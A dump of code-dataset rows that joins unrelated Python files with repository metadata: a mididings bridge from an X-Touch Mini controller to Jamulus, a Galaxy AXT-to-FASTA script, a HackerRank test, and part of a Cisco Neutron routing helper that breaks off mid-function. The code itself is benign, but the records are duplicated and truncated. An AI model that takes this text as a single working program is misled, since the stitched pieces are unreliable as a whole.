import alsaaudio
import time
import jack
import sys
import re
master = alsaaudio.Mixer('Master')
capture = alsaaudio.Mixer('Capture')
currentLayer = 0
jamulusChannel = 11
jamulusOutPort = 'out_2'
controllerChannel = 11
controllerGlobalChannel = 1
controllerOutPort = 'out_1'
ledRingSingle = 0
ledRingPan = 1
ledRingFan = 2
ledRingSpread = 3
ledRingTrim = 4
#
# configure mididings with 1 input & 2 output ports:
# - in from midi controller
# - out to midi controller, for setting LEDs etc.
# - out to Jamulus, with processed output (i.e. turn momentary switches into toggles)
#
# use buffered jack backend to minimize impact on audio
#
# automatically connect MIDI ports on startup.
# This script is lanuched in backgound before Jamulus is started
# Need to wait a few seconds before connecting to Jamulus
time.sleep(3)
# Jack has multiple mechanisms for sending alsa MIDI ports to Jack MIDI ports.
# All name the jack ports differently, and we want to work with them all.
# Mididings can use a regexp to look for a matching jack MIDI port
#
target_alias = '^.*X-TOUCH.MINI.*' # regexp allowed
client=jack.Client('mididings')
config(
backend='jack',
client_name='mididings',
in_ports = [
('in', target_alias ),
],
out_ports = [
(controllerOutPort, target_alias ),
(jamulusOutPort, 'Jamulus:input midi')
],
start_delay = 1
)
# there are 48 "buttons" on x-touch mini, on 2 layers (A & B)
# 8 x encoder push switches Layer A: 0-7 Layer B: 24-31
# 8 pushbuttons row 1 Layer A: 8-15 Layer B: 32-39
# 8 pushbuttons row 2 Layer A: 16-23 Layer B: 40-47
# x 2 layers
#
# save a toggle state for each one whether we intend to use it or not
# encoders: 0=fader (ledRing=fan) 1=pan (ledRing=pan)
# pushbuttons: 0=off (led off) 1=on (led on)
#
buttonState = [0] * 48
# Encoders will serve as both fader and pan,
# Encoder push switch will toggle state.
# LED setting of encoder will serve as visual feedback of current encoder state.
# For each encoder, save latest value so it can be restored on state change.
#
# There are 3 values for each encoder:
# encoderState (0=fader, 1=pan)
# faderValue
# panValue
encoderState = [0] * 19 # initialize to "fader" state
faderValue = [127] * 19 # initialize to full volume
panValue = [64] * 19 # initialize to pan center
#
# noteTable is a list of tuples, indexed by the note number 0-47
# the tuples contain:
# ( note, layer, jamulusControlNumber, encoderControlNumber )
#
# note: note number that will toggle state
# layer: 0=Layer A, 1=Layer B
# jamulusControlNumber: Control number to send to Jamulus (for mute & solo buttons)
# encoderControlNumber: Control number in xtouch-mini to send restored encoder value
#
noteTable = [
(0, 0, None, 1), # Layer A encoder push switches
(1, 0, None, 2),
(2, 0, None, 3),
(3, 0, None, 4),
(4, 0, None, 5),
(5, 0, None, 6),
(6, 0, None, 7),
(7, 0, None, 8),
(8, 0, 19, None), # Layer A pushbuttons row 1 (mute 1-8)
(9, 0, 20, None),
(10, 0, 21, None),
(11, 0, 22, None),
(12, 0, 23, None),
(13, 0, 24, None),
(14, 0, 25, None),
(15, 0, 26, None),
(16, 0, 35, None), # Layer A pushbuttons row 2 (solo 1-8)
(17, 0, 36, None),
(18, 0, 37, None),
(19, 0, 38, None),
(20, 0, 39, None),
(21, 0, 40, None),
(22, 0, 41, None),
(23, 0, 42, None),
(24, 1, None, 11), # Layer B encoder push switches
(25, 1, None, 12),
(26, 1, None, 13),
(27, 1, None, 14),
(28, 1, None, 15),
(29, 1, None, 16),
(30, 1, None, 17),
(31, 1, None, 18),
(32, 1, 27, None), # Layer B pushbuttons row 1 (mute 9-16)
(33, 1, 28, None),
(34, 1, 29, None),
(35, 1, 30, None),
(36, 1, 31, None),
(37, 1, 32, None),
(38, 1, 33, None),
(39, 1, 34, None),
(40, 1, 43, None), # Layer B pushbuttons row 2 (solo 9-16)
(41, 1, 44, None),
(42, 1, 45, None),
(43, 1, 46, None),
(44, 1, 47, None),
(45, 1, 48, None),
(46, 1, 49, None),
(47, 1, 50, None)
]
# There are 18 controls on x-touch mini
# 8 encoders Layer A: 1-8 Layer B: 11-18
# 1 slider Layer A: 9 Layer B: 10
# x 2 layers
#
# controlTable is a list of tuples, indexed by the control number 0-18
# the tuples contain:
# (encoderControlNumber, layer, ledRing, controlOutFader, controlOutPan )
#
# encoderControlNumber: Control number in xtouch-mini to receive, also to send restored encoder value
# layer: 0=Layer A, 1=Layer B
# ledRing: Control number to send to xtouch-mini to set led Ring behavior (fan for fader, pan for pan)
# controlOutFader: Control number to send to Jamulus for fader when in fader state
# controlOutPan: Control number to send to Jamulus for pan when in pan state
#
controlTable = [
(0, None, None, None, None), # contol number 0 not used
(1, 0, 1, 1, 51), # layer A encoders 1-8
(2, 0, 2, 2, 52),
(3, 0, 3, 3, 53),
(4, 0, 4, 4, 54),
(5, 0, 5, 5, 55),
(6, 0, 6, 6, 56),
(7, 0, 7, 7, 57),
(8, 0, 8, 8, 58),
(9, 0, None, None, None), # Layer A slider
(10, 1, None, None, None), # Layer B slider
(11, 1, 1, 9, 59), # layer B encoders 9-16
(12, 1, 2, 10, 60),
(13, 1, 3, 11, 61),
(14, 1, 4, 12, 62),
(15, 1, 5, 13, 63),
(16, 1, 6, 14, 64),
(17, 1, 7, 15, 65),
(18, 1, 8, 16, 66)
]
def controllerInit(event, newLayer):
    """Scene-init hook: return the full controller refresh event list.

    Combines the encoder value / LED-ring restore events for *newLayer*
    with the pushbutton LED restore events.  *event* is supplied by
    mididings' Process() but is not needed here.
    """
    return layerChangeEvents(newLayer) + controllerButtonsRestore()
def controllerButtonsRestore():
    """Return MIDI events restoring pushbutton LEDs from buttonState.

    The X-Touch Mini retains pushbutton LED state across layer changes,
    so this only needs to run at startup.  Only entries of noteTable
    with a Jamulus control number (i.e. the mute/solo pushbuttons) get
    an LED event; encoder push switches are handled by
    layerChangeEvents().
    """
    events = []
    for note in noteTable:
        (noteNumber, layer, jamulusControlNumber,
         encoderControlNumber) = note
        if jamulusControlNumber is not None:
            if buttonState[noteNumber] == 0:
                # LED off: velocity-0 note-off on the button's note number
                events.append(NoteOffEvent(controllerOutPort,
                                           controllerChannel, noteNumber, 0))
            else:
                # LED on: note-on with velocity 1
                events.append(NoteOnEvent(controllerOutPort,
                                          controllerChannel, noteNumber, 1))
    return events
def layerChangeEvents(newLayer):
    """Return the events that restore encoder state for *newLayer*.

    Pushbutton switches retain their LED state across layer changes,
    but encoder values and LED-ring styles are not remembered by the
    X-Touch Mini, so they are re-sent at init time and whenever a layer
    change is detected.
    """
    events = []
    for control in controlTable:
        (encoderControlNumber, layer, ledRing,
         controlOutFader, controlOutPan) = control
        # Only encoders (ledRing set) belonging to the new layer.
        if (layer is not None) and (layer == newLayer) and (
                ledRing is not None):
            # Restore this encoder's value and LED-ring style according
            # to its current fader/pan state.
            if encoderState[encoderControlNumber] == 0:
                encValue = faderValue[encoderControlNumber]
                encLedRing = ledRingFan
            else:
                encValue = panValue[encoderControlNumber]
                encLedRing = ledRingPan
            events.append(CtrlEvent(controllerOutPort, controllerChannel,
                                    encoderControlNumber, encValue))
            events.append(CtrlEvent(controllerOutPort,
                                    controllerGlobalChannel,
                                    ledRing, encLedRing))
    return events
#
# Convert the momentary on/off buttons to toggle events when the button press occurs
# Need to use NOTEOFF events, because X-touch mini
# does not allow setting LED while button is down
#
def noteOff(event):
    """Handle a NOTEOFF event from a pushbutton or encoder push switch.

    NOTEOFF (not NOTEON) must be used because the X-Touch Mini does not
    allow setting an LED while the button is held down.  Toggles the
    stored state for the button, detects layer changes, and returns the
    MIDI events to emit: LED feedback to the controller and, for the
    mute/solo pushbuttons, a control event to Jamulus.
    """
    global currentLayer
    events = []
    try:
        button = event.note
        # Toggle the button state and save it.
        state = buttonState[button] = 1 if (buttonState[button] == 0) else 0
        _, layer, jamulusControlNumber, encoderControlNumber = \
            noteTable[button]
        if layer != currentLayer:
            # First event seen on the other layer: refresh its encoders.
            events.extend(layerChangeEvents(layer))
            currentLayer = layer
        if jamulusControlNumber is not None:
            # Mute/solo pushbutton: echo the new LED state back to the
            # controller on the same note number and forward a control
            # event to Jamulus on the mapped control number.
            if state == 0:
                events.append(NoteOffEvent(controllerOutPort,
                                           controllerChannel, event.note, 0))
            else:
                events.append(NoteOnEvent(controllerOutPort,
                                          controllerChannel, event.note, 1))
            events.append(CtrlEvent(jamulusOutPort, jamulusChannel,
                                    jamulusControlNumber,
                                    0 if state == 0 else 127))
        elif encoderControlNumber is not None:
            # Encoder push switch: flip between fader and pan mode.
            ledRing = controlTable[encoderControlNumber][2]
            # Save a copy of the state for lookup by control number.
            encoderState[encoderControlNumber] = state
            if state == 0:
                encValue = faderValue[encoderControlNumber]
                encLedRing = ledRingFan
            else:
                encValue = panValue[encoderControlNumber]
                encLedRing = ledRingPan
            # Send the restored encoder value and the new LED-ring style
            # back to the X-Touch Mini.
            events.append(CtrlEvent(controllerOutPort, controllerChannel,
                                    encoderControlNumber, encValue))
            events.append(CtrlEvent(controllerOutPort,
                                    controllerGlobalChannel,
                                    ledRing, encLedRing))
    except Exception as e:
        # Best-effort: never let a malformed event kill the mididings patch.
        print(e)
    return events
# Process control value changes.
# Update the stored value, and send to jamulus channel based on the encoder state (fader or pan).
# Sliders are used as alsa controls for Master & Capture, not sent to Jamulus
def controlChange(event):
    """Handle a control-change event from an encoder or slider.

    Sliders (controls 9 and 10) drive the ALSA Master/Capture levels
    locally and are not forwarded to Jamulus.  Encoder values are stored
    (as fader or pan depending on the encoder's state) and forwarded to
    Jamulus on the mapped control number; the LED ring style is
    refreshed as well.
    """
    global currentLayer
    events = []
    try:
        controlIn = event.ctrl
        _, layer, ledRing, controlOutFader, controlOutPan = \
            controlTable[controlIn]
        if layer != currentLayer:
            # First event seen on the other layer: refresh its encoders.
            events.extend(layerChangeEvents(layer))
            currentLayer = layer
        if controlIn in (9, 10):
            # Sliders: scale 0-127 MIDI value to 0-100 ALSA percent.
            alsaLevel = event.value * 100 // 127
            if controlIn == 9:
                master.setvolume(alsaLevel)
            elif controlIn == 10:
                capture.setvolume(alsaLevel)
        else:
            encState = encoderState[controlIn]
            # Update the stored value (fader or pan) based on encState.
            if encState == 0:
                faderValue[controlIn] = event.value
                jamulusOutCtrl = controlOutFader
                ledRingState = ledRingFan
            else:
                panValue[controlIn] = event.value
                jamulusOutCtrl = controlOutPan
                ledRingState = ledRingPan
            # Forward the value to Jamulus on the mapped control number,
            # then refresh the controller's LED ring.
            events.append(CtrlEvent(jamulusOutPort, jamulusChannel,
                                    jamulusOutCtrl, event.value))
            events.append(CtrlEvent(controllerOutPort,
                                    controllerGlobalChannel,
                                    ledRing, ledRingState))
    except Exception as e:
        # Best-effort: never let a malformed event kill the mididings patch.
        print(e)
    return events
# X-Touch Mini sends events on midi channel 11.
# use jamulus --ctrlmidich string: "11;f1*16;m19*16;s35*16;p51*16"
# send channel 11 controls 1-18 to Jamulus on port 2 to use for faders (layer A, controls 1-8) and pan (layer b, controls 11-18)
#
# send controls 9 & 10 to alsa for Master and Capture levels
#
# for NOTEOFF events from pushbutton, toggle the button state
# and send back to x-touch mini on port1 to set LED state (convert to a NOTEON event to turn on LED)
# Also send to Jamulus on port 2 as a control event to set mute and solo buttons.
# Use controls above 18 to avoid conflict with physical controls
#
xtouchmini_patch16 = [
ChannelFilter(11) >> [
# Process control changes
CtrlFilter(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18) % Process(controlChange),
# Process button presses on NOTEOFF event
(KeyFilter(0,48) & Filter(NOTEOFF)) % Process(noteOff)
]
]
jamulus_midi = SceneGroup('jamulus_midi', [
Scene('xtouchmini', xtouchmini_patch16, [
[
# Scene initialization events go here
# set to standard mode (not Mackie Control)
Ctrl(controllerOutPort, controllerGlobalChannel, 127, 0),
# set to Layer A
Program(controllerOutPort, controllerGlobalChannel, 1),
# initialize controller encoder values and LED ring states
Process(controllerInit,0)
]
])
])
run(
# control=control,
# pre=preScene,
scenes={
1: jamulus_midi
}
)
| 5,567 | 0 | 113 |
04625ef97b3d9a70d91769d8ccbc3dd7efc12726 | 1,082 | py | Python | tools/filters/axt_to_fasta.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 2 | 2016-02-23T00:09:14.000Z | 2019-02-11T07:48:44.000Z | tools/filters/axt_to_fasta.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 1 | 2015-02-21T18:48:19.000Z | 2015-02-27T15:50:32.000Z | tools/filters/axt_to_fasta.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 6 | 2015-05-27T13:09:50.000Z | 2019-02-11T07:48:46.000Z | #!/usr/bin/env python
"""
Adapted from bx/scripts/axt_to_fasta.py
"""
from galaxy import eggs
import pkg_resources
pkg_resources.require( "bx-python" )
import sys
import bx.align.axt
# $$$ this should be moved to a bx.align.fasta module
if __name__ == "__main__": main()
| 21.64 | 66 | 0.654344 | #!/usr/bin/env python
"""
Adapted from bx/scripts/axt_to_fasta.py
"""
from galaxy import eggs
import pkg_resources
pkg_resources.require( "bx-python" )
import sys
import bx.align.axt
def usage(s=None):
    """Exit the program, printing the usage message.

    If *s* is given it is printed as an error line above the usage text.
    sys.exit raises SystemExit, so this never returns.
    """
    message = """
axt_to_fasta species1 species2 < axt_file > fasta_file
"""
    if s is None:
        sys.exit(message)
    else:
        sys.exit("%s\n%s" % (s, message))
def main():
    """Convert an AXT alignment stream on stdin to FASTA on stdout."""
    # check the command line
    # NOTE(review): missing arguments raise IndexError rather than
    # calling usage(); preserved as-is.
    species1 = sys.argv[1]
    species2 = sys.argv[2]
    # convert the alignment blocks
    reader = bx.align.axt.Reader(sys.stdin, support_ids=True,
                                 species1=species1, species2=species2)
    for a in reader:
        if "id" in a.attributes:
            block_id = a.attributes["id"]
        else:
            block_id = None
        print_component_as_fasta(a.components[0], block_id)
        print_component_as_fasta(a.components[1], block_id)
        # Blank separator line between alignment blocks.  The original
        # used the Python 2 bare print statement; sys.stdout.write works
        # identically on Python 2 and 3.
        sys.stdout.write("\n")
def print_component_as_fasta(c, id=None):
    """Write one alignment component to stdout as a FASTA record.

    The header is ">src_start_end", with the optional block *id*
    appended after a space.  *c* is expected to provide src, start,
    size and text attributes (bx alignment component).
    """
    header = ">%s_%s_%s" % (c.src, c.start, c.start + c.size)
    if id is not None:
        header += " " + id
    # The original used the Python 2 print statement; sys.stdout.write
    # produces the same output and is valid on both Python 2 and 3.
    sys.stdout.write(header + "\n")
    sys.stdout.write(c.text + "\n")
if __name__ == "__main__": main()
| 735 | 0 | 69 |
5b924eaa5c7595b402c7d9e6b8d0304889589068 | 809 | py | Python | hackerrank/30 Days of Code/Day 5 - Loops/test.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | 4 | 2020-07-24T01:59:50.000Z | 2021-07-24T15:14:08.000Z | hackerrank/30 Days of Code/Day 5 - Loops/test.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | hackerrank/30 Days of Code/Day 5 - Loops/test.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | import io
import unittest
from contextlib import redirect_stdout
import solution
if __name__ == '__main__':
unittest.main()
| 28.892857 | 46 | 0.363412 | import io
import unittest
from contextlib import redirect_stdout
import solution
class TestQ(unittest.TestCase):
    """Verify solution.main prints the full multiplication table for 2."""

    def test_case_0(self):
        # Trap stdout so the printed table can be compared.
        text_trap = io.StringIO()
        with redirect_stdout(text_trap):
            solution.main(2)
        # Expected: "2 x 1 = 2" through "2 x 10 = 20", one per line.
        expected = "".join("2 x %d = %d\n" % (i, 2 * i)
                           for i in range(1, 11))
        self.assertEqual(text_trap.getvalue(), expected)
if __name__ == '__main__':
unittest.main()
| 618 | 10 | 49 |
92f341927ed4dd0d4741361b5318c57e665127b7 | 52,243 | py | Python | networking_cisco/plugins/cisco/cfg_agent/service_helpers/routing_svc_helper.py | Gitweijie/first_project | e27ec5a03b20022a66c994c0ee89ef7023cc5c29 | [
"Apache-2.0"
] | null | null | null | networking_cisco/plugins/cisco/cfg_agent/service_helpers/routing_svc_helper.py | Gitweijie/first_project | e27ec5a03b20022a66c994c0ee89ef7023cc5c29 | [
"Apache-2.0"
] | null | null | null | networking_cisco/plugins/cisco/cfg_agent/service_helpers/routing_svc_helper.py | Gitweijie/first_project | e27ec5a03b20022a66c994c0ee89ef7023cc5c29 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import eventlet
import netaddr
import pprint as pp
from operator import itemgetter
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import excutils
from oslo_utils import importutils
import six
from neutron.common import exceptions as n_exc
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron_lib import exceptions as n_lib_exc
from networking_cisco._i18n import _, _LE, _LI, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.cfg_agent import cfg_exceptions
from networking_cisco.plugins.cisco.cfg_agent.device_drivers import driver_mgr
from networking_cisco.plugins.cisco.cfg_agent import device_status
from networking_cisco.plugins.cisco.common import (cisco_constants as
c_constants)
from networking_cisco.plugins.cisco.extensions import ha
from networking_cisco.plugins.cisco.extensions import routerrole
ncc_errors = importutils.try_import('ncclient.transport.errors')
LOG = logging.getLogger(__name__)
N_ROUTER_PREFIX = 'nrouter-'
ROUTER_ROLE_ATTR = routerrole.ROUTER_ROLE_ATTR
# Number of routers to fetch from server at a time on resync.
# Needed to reduce load on server side and to speed up resync on agent side.
SYNC_ROUTERS_MAX_CHUNK_SIZE = 64
SYNC_ROUTERS_MIN_CHUNK_SIZE = 8
class RouterInfo(object):
"""Wrapper class around the (neutron) router dictionary.
Information about the neutron router is exchanged as a python dictionary
between plugin and config agent. RouterInfo is a wrapper around that dict,
with attributes for common parameters. These attributes keep the state
of the current router configuration, and are used for detecting router
state changes when an updated router dict is received.
This is a modified version of the RouterInfo class defined in the
(reference) l3-agent implementation, for use with cisco config agent.
"""
@property
@property
@property
@router.setter
@property
class CiscoRoutingPluginApi(object):
    """RoutingServiceHelper(Agent) side of the routing RPC API."""
    # NOTE(review): the initializer that sets self.client (an
    # oslo.messaging RPC client) and self.host is not part of this
    # chunk; all methods below assume both attributes exist.

    def get_routers(self, context, router_ids=None, hd_ids=None):
        """Make a remote process call to retrieve the sync data for routers.

        :param context: session context
        :param router_ids: list of routers to fetch
        :param hd_ids: hosting device ids, only routers assigned to these
            hosting devices will be returned.
        """
        cctxt = self.client.prepare(version='1.1')
        return cctxt.call(context, 'cfg_sync_routers', host=self.host,
                          router_ids=router_ids, hosting_device_ids=hd_ids)

    def get_router_ids(self, context, router_ids=None, hd_ids=None):
        """Make a remote process call to retrieve scheduled routers ids."""
        cctxt = self.client.prepare(version='1.3')
        return cctxt.call(context, 'get_cfg_router_ids', host=self.host,
                          router_ids=router_ids, hosting_device_ids=hd_ids)

    def get_hardware_router_type_id(self, context):
        """Get the ID for the ASR1k hardware router type."""
        cctxt = self.client.prepare()
        return cctxt.call(context,
                          'get_hardware_router_type_id',
                          host=self.host)

    def update_floatingip_statuses(self, context, router_id, fip_statuses):
        """Update operational status for one or several floating IPs.

        :param context: contains user information
        :param router_id: id of router associated with the floatingips
        :param fip_statuses: dict with floatingip_id as key and status
            as value
        """
        cctxt = self.client.prepare(version='1.1')
        return cctxt.call(context, 'update_floatingip_statuses_cfg',
                          router_id=router_id, fip_statuses=fip_statuses)

    def send_update_port_statuses(self, context, port_ids, status):
        """Call the plugin to update the port status in the DB.

        :param context: contains user information
        :param port_ids: list of ids of the ports associated with the
            status
        :param status: value of the status for the given port list
            (port_ids)
        """
        cctxt = self.client.prepare(version='1.1')
        return cctxt.call(context, 'update_port_statuses_cfg',
                          port_ids=port_ids, status=status)
| 45.271231 | 79 | 0.604866 | # Copyright 2014 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import eventlet
import netaddr
import pprint as pp
from operator import itemgetter
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import excutils
from oslo_utils import importutils
import six
from neutron.common import exceptions as n_exc
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron_lib import exceptions as n_lib_exc
from networking_cisco._i18n import _, _LE, _LI, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.cfg_agent import cfg_exceptions
from networking_cisco.plugins.cisco.cfg_agent.device_drivers import driver_mgr
from networking_cisco.plugins.cisco.cfg_agent import device_status
from networking_cisco.plugins.cisco.common import (cisco_constants as
c_constants)
from networking_cisco.plugins.cisco.extensions import ha
from networking_cisco.plugins.cisco.extensions import routerrole
ncc_errors = importutils.try_import('ncclient.transport.errors')
LOG = logging.getLogger(__name__)
N_ROUTER_PREFIX = 'nrouter-'
ROUTER_ROLE_ATTR = routerrole.ROUTER_ROLE_ATTR
# Number of routers to fetch from server at a time on resync.
# Needed to reduce load on server side and to speed up resync on agent side.
SYNC_ROUTERS_MAX_CHUNK_SIZE = 64
SYNC_ROUTERS_MIN_CHUNK_SIZE = 8
class IPAddressMissingException(n_lib_exc.NeutronException):
message = _("Router port %(port_id)s has no IP address on subnet "
"%(subnet_id)s.")
class MultipleIPv4SubnetsException(n_lib_exc.NeutronException):
message = _("There should not be multiple IPv4 subnets %(subnets)s on "
"router port %(port_id)s")
class RouterInfo(object):
"""Wrapper class around the (neutron) router dictionary.
Information about the neutron router is exchanged as a python dictionary
between plugin and config agent. RouterInfo is a wrapper around that dict,
with attributes for common parameters. These attributes keep the state
of the current router configuration, and are used for detecting router
state changes when an updated router dict is received.
This is a modified version of the RouterInfo class defined in the
(reference) l3-agent implementation, for use with cisco config agent.
"""
def __init__(self, router_id, router):
self.router_id = router_id
self.ex_gw_port = None
self._snat_enabled = None
self._snat_action = None
self.internal_ports = []
self.floating_ips = []
self._router = None
self.router = router
self.routes = []
self.ha_info = router.get('ha_info')
@property
def router(self):
return self._router
@property
def id(self):
return self.router_id
@property
def snat_enabled(self):
return self._snat_enabled
@router.setter
def router(self, value):
self._router = value
if not self._router:
return
# enable_snat by default if it wasn't specified by plugin
self._snat_enabled = self._router.get('enable_snat', True)
def router_name(self):
return N_ROUTER_PREFIX + self.router_id
@property
def ha_enabled(self):
ha_enabled = self.router.get(ha.ENABLED, False)
return ha_enabled
class CiscoRoutingPluginApi(object):
"""RoutingServiceHelper(Agent) side of the routing RPC API."""
def __init__(self, topic, host):
self.host = host
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = n_rpc.get_client(target)
def get_routers(self, context, router_ids=None, hd_ids=None):
"""Make a remote process call to retrieve the sync data for routers.
:param context: session context
:param router_ids: list of routers to fetch
:param hd_ids : hosting device ids, only routers assigned to these
hosting devices will be returned.
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'cfg_sync_routers', host=self.host,
router_ids=router_ids, hosting_device_ids=hd_ids)
def get_router_ids(self, context, router_ids=None, hd_ids=None):
"""Make a remote process call to retrieve scheduled routers ids."""
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_cfg_router_ids', host=self.host,
router_ids=router_ids, hosting_device_ids=hd_ids)
def get_hardware_router_type_id(self, context):
"""Get the ID for the ASR1k hardware router type."""
cctxt = self.client.prepare()
return cctxt.call(context,
'get_hardware_router_type_id',
host=self.host)
def update_floatingip_statuses(self, context, router_id, fip_statuses):
"""Make a remote process call to update operational status for one or
several floating IPs.
@param context: contains user information
@param router_id: id of router associated with the floatingips
@param fip_statuses: dict with floatingip_id as key and status as value
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_floatingip_statuses_cfg',
router_id=router_id, fip_statuses=fip_statuses)
def send_update_port_statuses(self, context, port_ids, status):
"""Call the pluging to update the port status which updates the DB.
:param context: contains user information
:param port_ids: list of ids of the ports associated with the status
:param status: value of the status for the given port list (port_ids)
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_port_statuses_cfg',
port_ids=port_ids, status=status)
class RoutingServiceHelper(object):
target = oslo_messaging.Target(version='1.1')
def __init__(self, host, conf, cfg_agent):
self.conf = conf
self.cfg_agent = cfg_agent
self.context = bc.context.get_admin_context_without_session()
self.plugin_rpc = CiscoRoutingPluginApi(topics.L3PLUGIN, host)
self._dev_status = device_status.DeviceStatus()
self._dev_status.enable_heartbeat = (
self.conf.cfg_agent.enable_heartbeat)
self._drivermgr = driver_mgr.DeviceDriverManager()
self.router_info = {}
self.updated_routers = set()
self.removed_routers = set()
self.sync_devices = set()
self.sync_devices_attempts = 0
self.fullsync = True
self.sync_routers_chunk_size = SYNC_ROUTERS_MAX_CHUNK_SIZE
self.topic = '%s.%s' % (c_constants.CFG_AGENT_L3_ROUTING, host)
self.hardware_router_type = None
self.hardware_router_type_id = None
self._setup_rpc()
def _setup_rpc(self):
self.conn = n_rpc.create_connection()
self.endpoints = [self]
self.conn.create_consumer(self.topic, self.endpoints, fanout=False)
self.conn.consume_in_threads()
### Notifications from Plugin ####
def router_deleted(self, context, routers):
"""Deal with router deletion RPC message."""
LOG.debug('Got router deleted notification for %s', routers)
self.removed_routers.update(routers)
def routers_updated(self, context, routers):
"""Deal with routers modification and creation RPC message."""
LOG.debug('Got routers updated notification :%s', routers)
if routers:
# This is needed for backward compatibility
if isinstance(routers[0], dict):
routers = [router['id'] for router in routers]
self.updated_routers.update(routers)
def router_removed_from_hosting_device(self, context, routers):
LOG.debug('Got router removed from hosting device: %s', routers)
self.router_deleted(context, routers)
def router_added_to_hosting_device(self, context, routers):
LOG.debug('Got router added to hosting device :%s', routers)
self.routers_updated(context, routers)
# version 1.1
def routers_removed_from_hosting_device(self, context, router_ids):
LOG.debug('Got routers removed from hosting device: %s', router_ids)
self.router_deleted(context, router_ids)
# Routing service helper public methods
@property
def driver_manager(self):
return self._drivermgr
def process_service(self, device_ids=None, removed_devices_info=None):
try:
LOG.debug("Routing service processing started")
resources = {}
routers = []
removed_routers = []
all_routers_flag = False
if self.fullsync:
LOG.debug("FullSync flag is on. Starting fullsync")
# Setting all_routers_flag and clear the global full_sync flag
all_routers_flag = True
self.fullsync = False
self.router_info = {}
self.updated_routers.clear()
self.removed_routers.clear()
self.sync_devices.clear()
routers = self._fetch_router_info(all_routers=True)
LOG.debug("All routers: %s" % (pp.pformat(routers)))
if routers is not None:
self._cleanup_invalid_cfg(routers)
else:
if self.updated_routers:
router_ids = list(self.updated_routers)
LOG.debug("Updated routers:%s", router_ids)
self.updated_routers.clear()
routers = self._fetch_router_info(router_ids=router_ids)
LOG.debug("Updated routers:%s" % (pp.pformat(routers)))
if device_ids:
LOG.debug("Adding new devices:%s", device_ids)
self.sync_devices = set(device_ids) | self.sync_devices
if self.sync_devices:
self._handle_sync_devices(routers)
if removed_devices_info:
if removed_devices_info.get('deconfigure'):
ids = self._get_router_ids_from_removed_devices_info(
removed_devices_info)
self.removed_routers = self.removed_routers | set(ids)
if self.removed_routers:
removed_routers_ids = list(self.removed_routers)
LOG.debug("Removed routers:%s",
pp.pformat(removed_routers_ids))
for r in removed_routers_ids:
if r in self.router_info:
removed_routers.append(self.router_info[r].router)
# Sort on hosting device
if routers:
resources['routers'] = routers
if removed_routers:
resources['removed_routers'] = removed_routers
hosting_devices = self._sort_resources_per_hosting_device(
resources)
# Dispatch process_services() for each hosting device
pool = eventlet.GreenPool()
for device_id, resources in hosting_devices.items():
routers = resources.get('routers', [])
removed_routers = resources.get('removed_routers', [])
pool.spawn_n(self._process_routers, routers, removed_routers,
device_id, all_routers=all_routers_flag)
pool.waitall()
if removed_devices_info:
for hd_id in removed_devices_info['hosting_data']:
self.driver_manager.remove_driver_for_hosting_device(hd_id)
LOG.debug("Routing service processing successfully completed")
except Exception:
LOG.exception(_LE("Failed processing routers"))
self.fullsync = True
def collect_state(self, configurations):
"""Collect state from this helper.
A set of attributes which summarizes the state of the routers and
configurations managed by this config agent.
:param configurations: dict of configuration values
:return dict of updated configuration values
"""
num_ex_gw_ports = 0
num_interfaces = 0
num_floating_ips = 0
router_infos = self.router_info.values()
num_routers = len(router_infos)
num_hd_routers = collections.defaultdict(int)
for ri in router_infos:
ex_gw_port = ri.router.get('gw_port')
if ex_gw_port:
num_ex_gw_ports += 1
num_interfaces += len(ri.router.get(
bc.constants.INTERFACE_KEY, []))
num_floating_ips += len(ri.router.get(
bc.constants.FLOATINGIP_KEY, []))
hd = ri.router['hosting_device']
if hd:
num_hd_routers[hd['id']] += 1
routers_per_hd = dict((hd_id, {'routers': num})
for hd_id, num in num_hd_routers.items())
non_responding = self._dev_status.get_backlogged_hosting_devices()
configurations['total routers'] = num_routers
configurations['total ex_gw_ports'] = num_ex_gw_ports
configurations['total interfaces'] = num_interfaces
configurations['total floating_ips'] = num_floating_ips
configurations['hosting_devices'] = routers_per_hd
configurations['non_responding_hosting_devices'] = non_responding
return configurations
# Routing service helper internal methods
def _cleanup_invalid_cfg(self, routers):
# dict with hd id as key and associated routers list as val
hd_routermapping = collections.defaultdict(list)
